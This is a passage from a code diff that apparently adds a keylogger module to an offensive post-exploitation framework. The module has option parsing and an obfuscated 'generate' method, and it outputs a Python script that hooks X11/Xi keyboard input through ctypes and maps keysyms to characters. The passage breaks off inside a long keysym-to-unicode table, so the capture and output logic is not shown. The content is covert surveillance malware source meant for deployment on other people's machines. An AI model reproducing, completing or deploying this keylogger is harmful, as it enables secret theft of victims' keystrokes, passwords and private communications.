This is mostly + # in case options are passed on the command line + if params: + for param in params: + # parameter format is [Name, Value] + option, value = param + if option in self.options: + self.options[option]['Value'] = value + + def generate(self, obfuscate=False, obfuscationCommand=""): + + script = """# -*- coding: utf-8 -*- +# inspired from https://github.com/amoffat/pykeylogger +import sys +from time import sleep, time, strftime +import ctypes as ct +from ctypes.util import find_library + +try: + x11 = ct.cdll.LoadLibrary(find_library('X11')) + + x11.XkbOpenDisplay.restype = ct.c_void_p + x11.XkbOpenDisplay.argtypes = [ + ct.c_char_p, + ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.c_void_p + ] + x11.XCloseDisplay.argtypes = [ ct.c_void_p ] + x11.XQueryKeymap.restype = ct.c_int + x11.XQueryKeymap.argtypes = [ ct.c_void_p, ct.c_void_p ] + x11.XGetInputFocus.restype = ct.c_int + x11.XGetInputFocus.argtypes = [ ct.c_void_p, ct.c_void_p, ct.c_void_p ] + x11.XInternAtom.restype = ct.c_ulong + x11.XInternAtom.argtypes = [ ct.c_void_p, ct.c_char_p, ct.c_byte] + x11.XGetWMName.restype = ct.c_int + x11.XGetWMName.argtypes = [ct.c_void_p, ct.c_ulong, ct.c_void_p] + x11.XQueryTree.restype = ct.c_int + x11.XQueryTree.argtypes = [ct.c_void_p, ct.c_ulong, ct.c_void_p, ct.c_void_p, ct.POINTER(ct.c_ulong), ct.POINTER(ct.c_uint)] + x11.XGetClassHint.restype = ct.c_int + x11.XGetClassHint.argtypes = [ ct.c_void_p, ct.c_ulong, ct.c_void_p ] + x11.XkbGetKeyboard.restype = ct.c_void_p + x11.XkbGetKeyboard.argtypes = [ ct.c_void_p, ct.c_uint, ct.c_uint ] + x11.XkbGetState.argtypes = [ ct.c_void_p, ct.c_uint, ct.c_void_p ] + x11.XKeycodeToKeysym.restype = ct.c_uint + x11.XKeycodeToKeysym.argtypes = [ ct.c_void_p, ct.c_uint ] + x11.XkbKeycodeToKeysym.restype = ct.c_uint + x11.XkbKeycodeToKeysym.argtypes = [ ct.c_void_p, ct.c_uint ] + x11.XDefaultRootWindow.restype = ct.c_ulong + x11.XDefaultRootWindow.argtypes = [ ct.c_void_p ] + x11.XNextEvent.argtypes = [ 
ct.c_void_p, ct.c_void_p ] + x11.XMapWindow.argtypes = [ ct.c_void_p, ct.c_ulong ] + x11.XSync.argtypes = [ ct.c_void_p, ct.c_int ] + x11.XMaskEvent.argtypes = [ ct.c_void_p, ct.c_ulong, ct.c_void_p ] + x11.XSelectInput.argtypes = [ ct.c_void_p, ct.c_uint, ct.c_long ] + x11.XDestroyWindow.argtypes = [ ct.c_void_p, ct.c_ulong ] + x11.XGetEventData.argtypes = [ ct.c_void_p, ct.c_void_p ] + x11.XFreeEventData.argtypes = [ ct.c_void_p, ct.c_void_p ] + x11.XQueryExtension.argtypes = [ ct.c_void_p, ct.c_char_p, ct.c_void_p, ct.c_void_p, ct.c_void_p ] + x11.XGetWindowProperty.argtypes = [ ct.c_void_p, ct.c_ulong, ct.c_ulong, ct.c_long, ct.c_long, ct.c_int, + ct.c_ulong, ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.POINTER(ct.c_char_p)] + x11.XGetWindowProperty.restype = ct.c_int +except: + x11 = None + +try: + xi = ct.cdll.LoadLibrary(find_library('Xi')) + xi.XOpenDevice.restype = ct.c_void_p + xi.XOpenDevice.argtypes = [ ct.c_void_p, ct.c_uint ] + xi.XCloseDevice.argtypes = [ ct.c_void_p, ct.c_void_p ] + xi.XISelectEvents.argtypes = [ ct.c_void_p, ct.c_uint, ct.c_void_p, ct.c_int ] +except: + xi = None + + + +class ClassHint(ct.Structure): + _fields_ = [ + ( "name", ct.c_char_p ), + ( "klass", ct.c_char_p ) + ] + +class XkbState(ct.Structure): + _fields_ = [ + ( "group", ct.c_char ), + ( "locked_group", ct.c_char ), + ( "base_group", ct.c_char ), + ( "latched_group", ct.c_char ), + ( "mods", ct.c_char ), + ( "base_mods", ct.c_char ), + ( "latched_mods", ct.c_char ), + ( "locked_mods", ct.c_char ), + ( "compat_state", ct.c_char ), + ( "grab_mods", ct.c_char ), + ( "compat_grab_mods", ct.c_char ), + ( "lookup_mods", ct.c_char ), + ( "compat_lookup_mods", ct.c_char ), + ( "ptr_buttons", ct.c_char ) + ] + +class XiEventMask(ct.Structure): + _fields_ = [ + ( "deviceid", ct.c_int ), + ( "mask_len", ct.c_int ), + ( "mask", ct.c_void_p ) + ] + +class XGenericEventCookie(ct.Structure): + _fields_ = [ + ( "type", ct.c_int ), + ( "serial", ct.c_ulong ), + ( "send_event", 
ct.c_int ), + ( "display", ct.c_void_p ), + ( "extension", ct.c_int ), + ( "evtype", ct.c_int ), + ( "cookie", ct.c_uint ), + ( "data", ct.c_void_p ) + ] + +class XEventType(ct.Structure): + _fields_ = [ + ( "type", ct.c_int ), + ( "pad", ct.c_long * 24 ) + ] + +class XEvent(ct.Union): + _fields_ = [ + ( "type", XEventType ), + ( "cookie", XGenericEventCookie ), + ] + +class XIValuatorState(ct.Structure): + _fields_ = [ + ( "mask_len", ct.c_int ), + ( "mask", ct.c_void_p ), + ( "values", ct.c_void_p ), + ] + +class XIButtonState(ct.Structure): + _fields_ = [ + ( "mask_len", ct.c_int ), + ( "mask", ct.c_void_p ) + ] + +class XIModifierState(ct.Structure): + _fields_ = [ + ( "base", ct.c_int ), + ( "latched", ct.c_int ), + ( "locked", ct.c_int ), + ( "effective", ct.c_int ), + ] + +class XIDeviceEvent(ct.Structure): + _fields_ = [ + ( "type", ct.c_int ), + ( "serial", ct.c_ulong ), + ( "send_event", ct.c_int ), + ( "display", ct.c_void_p ), + ( "extension", ct.c_int ), + ( "evtype", ct.c_int ), + ( "time", ct.c_ulong ), + ( "deviceid", ct.c_int ), + ( "sourceid", ct.c_int ), + ( "detail", ct.c_int ), + ( "root", ct.c_ulong), + ( "event", ct.c_ulong ), + ( "child", ct.c_ulong ), + ( "root_x", ct.c_double ), + ( "root_y", ct.c_double ), + ( "event_x", ct.c_double ), + ( "event_y", ct.c_double ), + ( "flags", ct.c_int ), + ( "buttons" , XIButtonState ), + ( "valuators", XIValuatorState ), + ( "mods", XIModifierState ), + ( "group", XIModifierState ), + ] + +class XTextProperty(ct.Structure): + _fields_ = [("value" , ct.c_char_p), + ("encoding" , ct.c_ulong), + ("format" , ct.c_int), + ("nitems" , ct.c_ulong)] + +def XiMaxLen(): + return (((27) >> 3) + 1) + +def XiSetMask(mask, event): + mask[(event)>>3] |= (1 << ((event) & 7)) + +def keysym_to_XK(ks): + return { + 0xff08: "BackSpace", 0xff09: "Tab", 0xff0a: "Linefeed", 0xff0b: "Clear", + 0xff0d: "Return", 0xff13: "Pause", 0xff14: "Scroll_Lock", 0xff15: "Sys_Req", + 0xff1b: "Escape", 0xffff: "Delete", 0xff20: 
"Multi_key", 0xff37: "Codeinput", + 0xff3c: "SingleCandidate", 0xff3d: "MultipleCandidate", 0xff3e: "PreviousCandidate", 0xff21: "Kanji", + 0xff22: "Muhenkan", 0xff23: "Henkan_Mode", 0xff23: "Henkan", 0xff24: "Romaji", + 0xff25: "Hiragana", 0xff26: "Katakana", 0xff27: "Hiragana_Katakana", 0xff28: "Zenkaku", + 0xff29: "Hankaku", 0xff2a: "Zenkaku_Hankaku", 0xff2b: "Touroku", 0xff2c: "Massyo", + 0xff2d: "Kana_Lock", 0xff2e: "Kana_Shift", 0xff2f: "Eisu_Shift", 0xff30: "Eisu_toggle", + 0xff37: "Kanji_Bangou", 0xff3d: "Zen_Koho", 0xff3e: "Mae_Koho", 0xff50: "Home", + 0xff51: "Left", 0xff52: "Up", 0xff53: "Right", 0xff54: "Down", + 0xff55: "Prior", 0xff55: "Page_Up", 0xff56: "Next", 0xff56: "Page_Down", + 0xff57: "End", 0xff58: "Begin", 0xff60: "Select", 0xff61: "Print", + 0xff62: "Execute", 0xff63: "Insert", 0xff65: "Undo", 0xff66: "Redo", + 0xff67: "Menu", 0xff68: "Find", 0xff69: "Cancel", 0xff6a: "Help", + 0xff6b: "Break", 0xff7e: "Mode_switch", 0xff7e: "script_switch", 0xff7f: "Num_Lock", + 0xff80: "KP_Space", 0xff89: "KP_Tab", 0xff8d: "KP_Enter", 0xff91: "KP_F1", + 0xff92: "KP_F2", 0xff93: "KP_F3", 0xff94: "KP_F4", 0xff95: "KP_Home", + 0xff96: "KP_Left", 0xff97: "KP_Up", 0xff98: "KP_Right", 0xff99: "KP_Down", + 0xff9a: "KP_Prior", 0xff9a: "KP_Page_Up", 0xff9b: "KP_Next", 0xff9b: "KP_Page_Down", + 0xff9c: "KP_End", 0xff9d: "KP_Begin", 0xff9e: "KP_Insert", 0xff9f: "KP_Delete", + 0xffbd: "KP_Equal", 0xffaa: "KP_Multiply", 0xffab: "KP_Add", 0xffac: "KP_Separator", + 0xffad: "KP_Subtract", 0xffae: "KP_Decimal", 0xffaf: "KP_Divide", 0xffb0: "KP_0", + 0xffb1: "KP_1", 0xffb2: "KP_2", 0xffb3: "KP_3", 0xffb4: "KP_4", + 0xffb5: "KP_5", 0xffb6: "KP_6", 0xffb7: "KP_7", 0xffb8: "KP_8", + 0xffb9: "KP_9", 0xffbe: "F1", 0xffbf: "F2", 0xffc0: "F3", + 0xffc1: "F4", 0xffc2: "F5", 0xffc3: "F6", 0xffc4: "F7", + 0xffc5: "F8", 0xffc6: "F9", 0xffc7: "F10", 0xffc8: "F11", + 0xffc8: "L1", 0xffc9: "F12", 0xffc9: "L2", 0xffca: "F13", + 0xffca: "L3", 0xffcb: "F14", 0xffcb: "L4", 0xffcc: "F15", + 
0xffcc: "L5", 0xffcd: "F16", 0xffcd: "L6", 0xffce: "F17", + 0xffce: "L7", 0xffcf: "F18", 0xffcf: "L8", 0xffd0: "F19", + 0xffd0: "L9", 0xffd1: "F20", 0xffd1: "L10", 0xffd2: "F21", + 0xffd2: "R1", 0xffd3: "F22", 0xffd3: "R2", 0xffd4: "F23", + 0xffd4: "R3", 0xffd5: "F24", 0xffd5: "R4", 0xffd6: "F25", + 0xffd6: "R5", 0xffd7: "F26", 0xffd7: "R6", 0xffd8: "F27", + 0xffd8: "R7", 0xffd9: "F28", 0xffd9: "R8", 0xffda: "F29", + 0xffda: "R9", 0xffdb: "F30", 0xffdb: "R10", 0xffdc: "F31", + 0xffdc: "R11", 0xffdd: "F32", 0xffdd: "R12", 0xffde: "F33", + 0xffde: "R13", 0xffdf: "F34", 0xffdf: "R14", 0xffe0: "F35", + 0xffe0: "R15", 0xffe1: "Shift_L", 0xffe2: "Shift_R", 0xffe3: "Control_L", + 0xffe4: "Control_R", 0xffe5: "Caps_Lock", 0xffe6: "Shift_Lock", 0xffe7: "Meta_L", + 0xffe8: "Meta_R", 0xffe9: "Alt_L", 0xffea: "Alt_R", 0xffeb: "Super_L", + 0xffec: "Super_R", 0xffed: "Hyper_L", 0xffee: "Hyper_R", 0xff7e: "ISO_Group_Shift", + 0xff7e: "kana_switch", 0xff7e: "Arabic_switch", 0xff7e: "Greek_switch", 0xff7e: "Hebrew_switch", + 0xff31: "Hangul", 0xff32: "Hangul_Start", 0xff33: "Hangul_End", 0xff34: "Hangul_Hanja", + 0xff35: "Hangul_Jamo", 0xff36: "Hangul_Romaja", 0xff37: "Hangul_Codeinput", 0xff38: "Hangul_Jeonja", + 0xff39: "Hangul_Banja", 0xff3a: "Hangul_PreHanja", 0xff3b: "Hangul_PostHanja", + 0xff3c: "Hangul_SingleCandidate", 0xff3d: "Hangul_MultipleCandidate", + 0xff3e: "Hangul_PreviousCandidate", 0xff3f: "Hangul_Special", + 0xff7e: "Hangul_switch", 0xfff1: "braille_dot_1", 0xfff2: "braille_dot_2", 0xfff3: "braille_dot_3", + 0xfff4: "braille_dot_4", 0xfff5: "braille_dot_5", 0xfff6: "braille_dot_6", 0xfff7: "braille_dot_7", + 0xfff8: "braille_dot_8", 0xfff9: "braille_dot_9", 0xfffa: "braille_dot_10" + }.get(ks) + +def keysym_to_unicode(ks): + # https://raw.githubusercontent.com/substack/node-keysym/master/data/keysyms.txt + return { + 0x0020: u'\\u0020', 0x0021: u'\\u0021', 0x0022: u'\\u0022', 0x0023: u'\\u0023', 0x0024: u'\\u0024', + 0x0025: u'\\u0025', 0x0026: u'\\u0026', 
0x0027: u'\\u0027', 0x0027: u'\\u0027', 0x0028: u'\\u0028', + 0x0029: u'\\u0029', 0x002a: u'\\u002a', 0x002b: u'\\u002b', 0x002c: u'\\u002c', 0x002d: u'\\u002d', + 0x002e: u'\\u002e', 0x002f: u'\\u002f', 0x0030: u'\\u0030', 0x0031: u'\\u0031', 0x0032: u'\\u0032', + 0x0033: u'\\u0033', 0x0034: u'\\u0034', 0x0035: u'\\u0035', 0x0036: u'\\u0036', 0x0037: u'\\u0037', + 0x0038: u'\\u0038', 0x0039: u'\\u0039', 0x003a: u'\\u003a', 0x003b: u'\\u003b', 0x003c: u'\\u003c', + 0x003d: u'\\u003d', 0x003e: u'\\u003e', 0x003f: u'\\u003f', 0x0040: u'\\u0040', 0x0041: u'\\u0041', + 0x0042: u'\\u0042', 0x0043: u'\\u0043', 0x0044: u'\\u0044', 0x0045: u'\\u0045', 0x0046: u'\\u0046', + 0x0047: u'\\u0047', 0x0048: u'\\u0048', 0x0049: u'\\u0049', 0x004a: u'\\u004a', 0x004b: u'\\u004b', + 0x004c: u'\\u004c', 0x004d: u'\\u004d', 0x004e: u'\\u004e', 0x004f: u'\\u004f', 0x0050: u'\\u0050', + 0x0051: u'\\u0051', 0x0052: u'\\u0052', 0x0053: u'\\u0053', 0x0054: u'\\u0054', 0x0055: u'\\u0055', + 0x0056: u'\\u0056', 0x0057: u'\\u0057', 0x0058: u'\\u0058', 0x0059: u'\\u0059', 0x005a: u'\\u005a', + 0x005b: u'\\u005b', 0x005c: u'\\u005c', 0x005d: u'\\u005d', 0x005e: u'\\u005e', 0x005f: u'\\u005f', + 0x0060: u'\\u0060', 0x0060: u'\\u0060', 0x0061: u'\\u0061', 0x0062: u'\\u0062', 0x0063: u'\\u0063', + 0x0064: u'\\u0064', 0x0065: u'\\u0065', 0x0066: u'\\u0066', 0x0067: u'\\u0067', 0x0068: u'\\u0068', + 0x0069: u'\\u0069', 0x006a: u'\\u006a', 0x006b: u'\\u006b', 0x006c: u'\\u006c', 0x006d: u'\\u006d', + 0x006e: u'\\u006e', 0x006f: u'\\u006f', 0x0070: u'\\u0070', 0x0071: u'\\u0071', 0x0072: u'\\u0072', + 0x0073: u'\\u0073', 0x0074: u'\\u0074', 0x0075: u'\\u0075', 0x0076: u'\\u0076', 0x0077: u'\\u0077', + 0x0078: u'\\u0078', 0x0079: u'\\u0079', 0x007a: u'\\u007a', 0x007b: u'\\u007b', 0x007c: u'\\u007c', + 0x007d: u'\\u007d', 0x007e: u'\\u007e', 0x00a0: u'\\u00a0', 0x00a1: u'\\u00a1', 0x00a2: u'\\u00a2', + 0x00a3: u'\\u00a3', 0x00a4: u'\\u00a4', 0x00a5: u'\\u00a5', 0x00a6: u'\\u00a6', 0x00a7: u'\\u00a7', + 
0x00a8: u'\\u00a8', 0x00a9: u'\\u00a9', 0x00aa: u'\\u00aa', 0x00ab: u'\\u00ab', 0x00ac: u'\\u00ac', + 0x00ad: u'\\u00ad', 0x00ae: u'\\u00ae', 0x00af: u'\\u00af', 0x00b0: u'\\u00b0', 0x00b1: u'\\u00b1', + 0x00b2: u'\\u00b2', 0x00b3: u'\\u00b3', 0x00b4: u'\\u00b4', 0x00b5: u'\\u00b5', 0x00b6: u'\\u00b6', + 0x00b7: u'\\u00b7', 0x00b8: u'\\u00b8', 0x00b9: u'\\u00b9', 0x00ba: u'\\u00ba', 0x00bb: u'\\u00bb', + 0x00bc: u'\\u00bc', 0x00bd: u'\\u00bd', 0x00be: u'\\u00be', 0x00bf: u'\\u00bf', 0x00c0: u'\\u00c0', + 0x00c1: u'\\u00c1', 0x00c2: u'\\u00c2', 0x00c3: u'\\u00c3', 0x00c4: u'\\u00c4', 0x00c5: u'\\u00c5', + 0x00c6: u'\\u00c6', 0x00c7: u'\\u00c7', 0x00c8: u'\\u00c8', 0x00c9: u'\\u00c9', 0x00ca: u'\\u00ca', + 0x00cb: u'\\u00cb', 0x00cc: u'\\u00cc', 0x00cd: u'\\u00cd', 0x00ce: u'\\u00ce', 0x00cf: u'\\u00cf', + 0x00d0: u'\\u00d0', 0x00d0: u'\\u00d0', 0x00d1: u'\\u00d1', 0x00d2: u'\\u00d2', 0x00d3: u'\\u00d3', + 0x00d4: u'\\u00d4', 0x00d5: u'\\u00d5', 0x00d6: u'\\u00d6', 0x00d7: u'\\u00d7', 0x00d8: u'\\u00d8', + 0x00d9: u'\\u00d9', 0x00da: u'\\u00da', 0x00db: u'\\u00db', 0x00dc: u'\\u00dc', 0x00dd: u'\\u00dd', + 0x00de: u'\\u00de', 0x00de: u'\\u00de', 0x00df: u'\\u00df', 0x00e0: u'\\u00e0', 0x00e1: u'\\u00e1', + 0x00e2: u'\\u00e2', 0x00e3: u'\\u00e3', 0x00e4: u'\\u00e4', 0x00e5: u'\\u00e5', 0x00e6: u'\\u00e6', + 0x00e7: u'\\u00e7', 0x00e8: u'\\u00e8', 0x00e9: u'\\u00e9', 0x00ea: u'\\u00ea', 0x00eb: u'\\u00eb', + 0x00ec: u'\\u00ec', 0x00ed: u'\\u00ed', 0x00ee: u'\\u00ee', 0x00ef: u'\\u00ef', 0x00f0: u'\\u00f0', + 0x00f1: u'\\u00f1', 0x00f2: u'\\u00f2', 0x00f3: u'\\u00f3', 0x00f4: u'\\u00f4', 0x00f5: u'\\u00f5', + 0x00f6: u'\\u00f6', 0x00f7: u'\\u00f7', 0x00f8: u'\\u00f8', 0x00f9: u'\\u00f9', 0x00fa: u'\\u00fa', + 0x00fb: u'\\u00fb', 0x00fc: u'\\u00fc', 0x00fd: u'\\u00fd', 0x00fe: u'\\u00fe', 0x00ff: u'\\u00ff', + 0x01a1: u'\\u0104', 0x01a2: u'\\u02d8', 0x01a3: u'\\u0141', 0x01a5: u'\\u013d', 0x01a6: u'\\u015a', + 0x01a9: u'\\u0160', 0x01aa: u'\\u015e', 0x01ab: u'\\u0164', 
0x01ac: u'\\u0179', 0x01ae: u'\\u017d', + 0x01af: u'\\u017b', 0x01b1: u'\\u0105', 0x01b2: u'\\u02db', 0x01b3: u'\\u0142', 0x01b5: u'\\u013e', + 0x01b6: u'\\u015b', 0x01b7: u'\\u02c7', 0x01b9: u'\\u0161', 0x01ba: u'\\u015f', 0x01bb: u'\\u0165', + 0x01bc: u'\\u017a', 0x01bd: u'\\u02dd', 0x01be: u'\\u017e', 0x01bf: u'\\u017c', 0x01c0: u'\\u0154', + 0x01c3: u'\\u0102', 0x01c5: u'\\u0139', 0x01c6: u'\\u0106', 0x01c8: u'\\u010c', 0x01ca: u'\\u0118', + 0x01cc: u'\\u011a', 0x01cf: u'\\u010e', 0x01d0: u'\\u0110', 0x01d1: u'\\u0143', 0x01d2: u'\\u0147', + 0x01d5: u'\\u0150', 0x01d8: u'\\u0158', 0x01d9: u'\\u016e', 0x01db: u'\\u0170', 0x01de: u'\\u0162', + 0x01e0: u'\\u0155', 0x01e3: u'\\u0103', 0x01e5: u'\\u013a', 0x01e6: u'\\u0107', 0x01e8: u'\\u010d', + 0x01ea: u'\\u0119', 0x01ec: u'\\u011b', 0x01ef: u'\\u010f', 0x01f0: u'\\u0111', 0x01f1: u'\\u0144', + 0x01f2: u'\\u0148', 0x01f5: u'\\u0151', 0x01f8: u'\\u0159', 0x01f9: u'\\u016f', 0x01fb: u'\\u0171', + 0x01fe: u'\\u0163', 0x01ff: u'\\u02d9', 0x02a1: u'\\u0126', 0x02a6: u'\\u0124', 0x02a9: u'\\u0130', + 0x02ab: u'\\u011e', 0x02ac: u'\\u0134', 0x02b1: u'\\u0127', 0x02b6: u'\\u0125', 0x02b9: u'\\u0131', + 0x02bb: u'\\u011f', 0x02bc: u'\\u0135', 0x02c5: u'\\u010a', 0x02c6: u'\\u0108', 0x02d5: u'\\u0120', + 0x02d8: u'\\u011c', 0x02dd: u'\\u016c', 0x02de: u'\\u015c', 0x02e5: u'\\u010b', 0x02e6: u'\\u0109', + 0x02f5: u'\\u0121', 0x02f8: u'\\u011d', 0x02fd: u'\\u016d', 0x02fe: u'\\u015d', 0x03a2: u'\\u0138', + 0x03a3: u'\\u0156', 0x03a5: u'\\u0128', 0x03a6: u'\\u013b', 0x03aa: u'\\u0112', 0x03ab: u'\\u0122', + 0x03ac: u'\\u0166', 0x03b3: u'\\u0157', 0x03b5: u'\\u0129', 0x03b6: u'\\u013c', 0x03ba: u'\\u0113', + 0x03bb: u'\\u0123', 0x03bc: u'\\u0167', 0x03bd: u'\\u014a', 0x03bf: u'\\u014b', 0x03c0: u'\\u0100', + 0x03c7: u'\\u012e', 0x03cc: u'\\u0116', 0x03cf: u'\\u012a', 0x03d1: u'\\u0145', 0x03d2: u'\\u014c', + 0x03d3: u'\\u0136', 0x03d9: u'\\u0172', 0x03dd: u'\\u0168', 0x03de: u'\\u016a', 0x03e0: u'\\u0101', + 0x03e7: u'\\u012f', 
0x03ec: u'\\u0117', 0x03ef: u'\\u012b', 0x03f1: u'\\u0146', 0x03f2: u'\\u014d', + 0x03f3: u'\\u0137', 0x03f9: u'\\u0173', 0x03fd: u'\\u0169', 0x03fe: u'\\u016b', 0x047e: u'\\u203e', + 0x04a1: u'\\u3002', 0x04a2: u'\\u300c', 0x04a3: u'\\u300d', 0x04a4: u'\\u3001', 0x04a5: u'\\u30fb', + 0x04a6: u'\\u30f2', 0x04a7: u'\\u30a1', 0x04a8: u'\\u30a3', 0x04a9: u'\\u30a5', 0x04aa: u'\\u30a7', + 0x04ab: u'\\u30a9', 0x04ac: u'\\u30e3', 0x04ad: u'\\u30e5', 0x04ae: u'\\u30e7', 0x04af: u'\\u30c3', + 0x04b0: u'\\u30fc', 0x04b1: u'\\u30a2', 0x04b2: u'\\u30a4', 0x04b3: u'\\u30a6', 0x04b4: u'\\u30a8', + 0x04b5: u'\\u30aa', 0x04b6: u'\\u30ab', 0x04b7: u'\\u30ad', 0x04b8: u'\\u30af', 0x04b9: u'\\u30b1', + 0x04ba: u'\\u30b3', 0x04bb: u'\\u30b5', 0x04bc: u'\\u30b7', 0x04bd: u'\\u30b9', 0x04be: u'\\u30bb', + 0x04bf: u'\\u30bd', 0x04c0: u'\\u30bf', 0x04c1: u'\\u30c1', 0x04c2: u'\\u30c4', 0x04c3: u'\\u30c6', + 0x04c4: u'\\u30c8', 0x04c5: u'\\u30ca', 0x04c6: u'\\u30cb', 0x04c7: u'\\u30cc', 0x04c8: u'\\u30cd', + 0x04c9: u'\\u30ce', 0x04ca: u'\\u30cf', 0x04cb: u'\\u30d2', 0x04cc: u'\\u30d5', 0x04cd: u'\\u30d8', + 0x04ce: u'\\u30db', 0x04cf: u'\\u30de', 0x04d0: u'\\u30df', 0x04d1: u'\\u30e0', 0x04d2: u'\\u30e1', + 0x04d3: u'\\u30e2', 0x04d4: u'\\u30e4', 0x04d5: u'\\u30e6', 0x04d6: u'\\u30e8', 0x04d7: u'\\u30e9', + 0x04d8: u'\\u30ea', 0x04d9: u'\\u30eb', 0x04da: u'\\u30ec', 0x04db: u'\\u30ed', 0x04dc: u'\\u30ef', + 0x04dd: u'\\u30f3', 0x04de: u'\\u309b', 0x04df: u'\\u309c', 0x05ac: u'\\u060c', 0x05bb: u'\\u061b', + 0x05bf: u'\\u061f', 0x05c1: u'\\u0621', 0x05c2: u'\\u0622', 0x05c3: u'\\u0623', 0x05c4: u'\\u0624', + 0x05c5: u'\\u0625', 0x05c6: u'\\u0626', 0x05c7: u'\\u0627', 0x05c8: u'\\u0628', 0x05c9: u'\\u0629', + 0x05ca: u'\\u062a', 0x05cb: u'\\u062b', 0x05cc: u'\\u062c', 0x05cd: u'\\u062d', 0x05ce: u'\\u062e', + 0x05cf: u'\\u062f', 0x05d0: u'\\u0630', 0x05d1: u'\\u0631', 0x05d2: u'\\u0632', 0x05d3: u'\\u0633', + 0x05d4: u'\\u0634', 0x05d5: u'\\u0635', 0x05d6: u'\\u0636', 0x05d7: u'\\u0637', 
0x05d8: u'\\u0638', + 0x05d9: u'\\u0639', 0x05da: u'\\u063a', 0x05e0: u'\\u0640', 0x05e1: u'\\u0641', 0x05e2: u'\\u0642', + 0x05e3: u'\\u0643', 0x05e4: u'\\u0644', 0x05e5: u'\\u0645', 0x05e6: u'\\u0646', 0x05e7: u'\\u0647', + 0x05e8: u'\\u0648', 0x05e9: u'\\u0649', 0x05ea: u'\\u064a', 0x05eb: u'\\u064b', 0x05ec: u'\\u064c', + 0x05ed: u'\\u064d', 0x05ee: u'\\u064e', 0x05ef: u'\\u064f', 0x05f0: u'\\u0650', 0x05f1: u'\\u0651', + 0x05f2: u'\\u0652', 0x06a1: u'\\u0452', 0x06a2: u'\\u0453', 0x06a3: u'\\u0451', 0x06a4: u'\\u0454', + 0x06a5: u'\\u0455', 0x06a6: u'\\u0456', 0x06a7: u'\\u0457', 0x06a8: u'\\u0458', 0x06a9: u'\\u0459', + 0x06aa: u'\\u045a', 0x06ab: u'\\u045b', 0x06ac: u'\\u045c', 0x06ae: u'\\u045e', 0x06af: u'\\u045f', + 0x06b0: u'\\u2116', 0x06b1: u'\\u0402', 0x06b2: u'\\u0403', 0x06b3: u'\\u0401', 0x06b4: u'\\u0404', + 0x06b5: u'\\u0405', 0x06b6: u'\\u0406', 0x06b7: u'\\u0407', 0x06b8: u'\\u0408', 0x06b9: u'\\u0409', + 0x06ba: u'\\u040a', 0x06bb: u'\\u040b', 0x06bc: u'\\u040c', 0x06be: u'\\u040e', 0x06bf: u'\\u040f', + 0x06c0: u'\\u044e', 0x06c1: u'\\u0430', 0x06c2: u'\\u0431', 0x06c3: u'\\u0446', 0x06c4: u'\\u0434', + 0x06c5: u'\\u0435', 0x06c6: u'\\u0444', 0x06c7: u'\\u0433', 0x06c8: u'\\u0445', 0x06c9: u'\\u0438', + 0x06ca: u'\\u0439', 0x06cb: u'\\u043a', 0x06cc: u'\\u043b', 0x06cd: u'\\u043c', 0x06ce: u'\\u043d', + 0x06cf: u'\\u043e', 0x06d0: u'\\u043f', 0x06d1: u'\\u044f', 0x06d2: u'\\u0440', 0x06d3: u'\\u0441', + 0x06d4: u'\\u0442', 0x06d5: u'\\u0443', 0x06d6: u'\\u0436', 0x06d7: u'\\u0432', 0x06d8: u'\\u044c', + 0x06d9: u'\\u044b', 0x06da: u'\\u0437', 0x06db: u'\\u0448', 0x06dc: u'\\u044d', 0x06dd: u'\\u0449', + 0x06de: u'\\u0447', 0x06df: u'\\u044a', 0x06e0: u'\\u042e', 0x06e1: u'\\u0410', 0x06e2: u'\\u0411', + 0x06e3: u'\\u0426', 0x06e4: u'\\u0414', 0x06e5: u'\\u0415', 0x06e6: u'\\u0424', 0x06e7: u'\\u0413', + 0x06e8: u'\\u0425', 0x06e9: u'\\u0418', 0x06ea: u'\\u0419', 0x06eb: u'\\u041a', 0x06ec: u'\\u041b', + 0x06ed: u'\\u041c', 0x06ee: u'\\u041d', 
0x06ef: u'\\u041e', 0x06f0: u'\\u041f', 0x06f1: u'\\u042f', + 0x06f2: u'\\u0420', 0x06f3: u'\\u0421', 0x06f4: u'\\u0422', 0x06f5: u'\\u0423', 0x06f6: u'\\u0416', + 0x06f7: u'\\u0412', 0x06f8: u'\\u042c', 0x06f9: u'\\u042b', 0x06fa: u'\\u0417', 0x06fb: u'\\u0428', + 0x06fc: u'\\u042d', 0x06fd: u'\\u0429', 0x06fe: u'\\u0427', 0x06ff: u'\\u042a', 0x07a1: u'\\u0386', + 0x07a2: u'\\u0388', 0x07a3: u'\\u0389', 0x07a4: u'\\u038a', 0x07a5: u'\\u03aa', 0x07a7: u'\\u038c', + 0x07a8: u'\\u038e', 0x07a9: u'\\u03ab', 0x07ab: u'\\u038f', 0x07ae: u'\\u0385', 0x07af: u'\\u2015', + 0x07b1: u'\\u03ac', 0x07b2: u'\\u03ad', 0x07b3: u'\\u03ae', 0x07b4: u'\\u03af', 0x07b5: u'\\u03ca', + 0x07b6: u'\\u0390', 0x07b7: u'\\u03cc', 0x07b8: u'\\u03cd', 0x07b9: u'\\u03cb', 0x07ba: u'\\u03b0', + 0x07bb: u'\\u03ce', 0x07c1: u'\\u0391', 0x07c2: u'\\u0392', 0x07c3: u'\\u0393', 0x07c4: u'\\u0394', + 0x07c5: u'\\u0395', 0x07c6: u'\\u0396', 0x07c7: u'\\u0397', 0x07c8: u'\\u0398', 0x07c9: u'\\u0399', + 0x07ca: u'\\u039a', 0x07cb: u'\\u039b', 0x07cb: u'\\u039b', 0x07cc: u'\\u039c', 0x07cd: u'\\u039d', + 0x07ce: u'\\u039e', 0x07cf: u'\\u039f', 0x07d0: u'\\u03a0', 0x07d1: u'\\u03a1', 0x07d2: u'\\u03a3', + 0x07d4: u'\\u03a4', 0x07d5: u'\\u03a5', 0x07d6: u'\\u03a6', 0x07d7: u'\\u03a7', 0x07d8: u'\\u03a8', + 0x07d9: u'\\u03a9', 0x07e1: u'\\u03b1', 0x07e2: u'\\u03b2', 0x07e3: u'\\u03b3', 0x07e4: u'\\u03b4', + 0x07e5: u'\\u03b5', 0x07e6: u'\\u03b6', 0x07e7: u'\\u03b7', 0x07e8: u'\\u03b8', 0x07e9: u'\\u03b9', + 0x07ea: u'\\u03ba', 0x07eb: u'\\u03bb', 0x07ec: u'\\u03bc', 0x07ed: u'\\u03bd', 0x07ee: u'\\u03be', + 0x07ef: u'\\u03bf', 0x07f0: u'\\u03c0', 0x07f1: u'\\u03c1', 0x07f2: u'\\u03c3', 0x07f3: u'\\u03c2', + 0x07f4: u'\\u03c4', 0x07f5: 